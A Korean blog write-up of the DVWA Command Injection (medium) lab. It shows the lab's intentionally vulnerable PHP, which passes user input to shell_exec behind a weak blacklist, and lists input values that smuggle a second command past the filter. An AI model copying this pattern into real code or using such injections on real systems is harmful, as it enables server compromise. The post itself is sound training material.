본문 바로가기

웹해킹/DVWA

DVWA Command Injection(medium) 롸업

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Set blacklist
    $substitutions = array(
        '&&' => '',
        ';'  => '',
    );

    // Remove any of the characters in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}

?>

구성 코드이다.

 

low 레벨과 달라진 점은 &&와 ; 문자에 대한 필터링이 생긴 점이다.

&, |, ``, $ 등의 문자는 필터링이 없다.

127.0.0.1 'dir'

127.0.0.1 $(dir) 

127.0.0.1 & dir

등과 같은 입력값을 사용해서 필터링을 우회하고 원하는 명령어를 실행할 수 있다.

'웹해킹 > DVWA' 카테고리의 다른 글

DVWA File Inclusion(medium) 롸업  (0) 2023.11.14
DVWA CSRF(medium) 롸업  (0) 2023.11.13
DVWA Brute Force(medium) 롸업  (0) 2023.11.13
DVWA Open HTTP Redirect(low) 롸업  (0) 2023.11.11
DVWA Authorisation Bypass(low) 롸업  (0) 2023.11.11